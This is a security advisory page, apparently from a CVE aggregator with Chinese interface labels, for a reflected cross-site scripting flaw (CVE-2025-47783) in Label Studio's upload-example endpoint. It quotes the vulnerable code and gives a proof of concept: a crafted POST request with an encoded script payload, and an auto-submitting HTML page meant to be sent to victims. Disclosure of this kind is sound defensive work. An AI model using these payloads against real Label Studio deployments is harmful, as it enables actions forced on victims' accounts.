CVE-2025-47783

MEDIUM6.1EPSS 0.20%

label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter.

發布日:2025/5/15修改日:2026/5/20

也稱為:GHSA-8jhr-wpcm-hh4hPYSEC-2025-124

描述

### Summary The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks. ### Details The vulnerability is reproducible when sending a properly formatted request to the `POST /projects/upload-example/` endpoint. In the source code, the vulnerability is located at `label_studio/projects/views.py`. ```python 39: @require_http_methods(['POST']) 40: def upload_example_using_config(request): 41: """Generate upload data example by config only""" 42: config = request.POST.get('label_config', '') 43: 44: org_pk = get_organization_from_request(request) 45: secure_mode = False 46: if org_pk is not None: 47: org = generics.get_object_or_404(Organization, pk=org_pk) 48: secure_mode = org.secure_mode 49: 50: try: 51: Project.validate_label_config(config) 52: task_data, _, _ = get_sample_task(config, secure_mode) 53: task_data = playground_replacements(request, task_data) 54: except (ValueError, ValidationError, lxml.etree.Error): 55: response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST) 56: else: 57: response = HttpResponse(json.dumps(task_data)) 58: return response ``` The vulnerability is specifically located in line 57, where HttpResponse is used. ```python 57: response = HttpResponse(json.dumps(task_data)) ``` ### PoC Send the following request after changing the `{host}` to your own. ```css POST /projects/upload-example/ HTTP/1.1 Host: {host} Content-Type: application/x-www-form-urlencoded Content-Length: 67 label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e ``` Or you can create a vulnerable HTML page by changing `{domain}` beforehand, which can later be sent to the victim. ```html <html> <body> <form action="http://{domain}/projects/upload-example/" method="POST"> <input type="hidden" name="label_config" value="<View><Text name="text" value="$textjmwwi&lt;script&gt;alert(1)&lt;/script&gt;s8m37"/></View>" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` ### Impact - Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing `document.cookie`, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.

受影響套件(2)

PyPI/label-studiofrom 0, < 1.18.0
PyPI/label-studiofrom 0, < 1.18.0

CVSS 分數

來源	版本	嚴重程度	向量
osv	CVSS 4.0	—	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N
osv	CVSS 3.1	MEDIUM6.1	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

描述

受影響套件(2)

CVSS 分數

參考連結(4)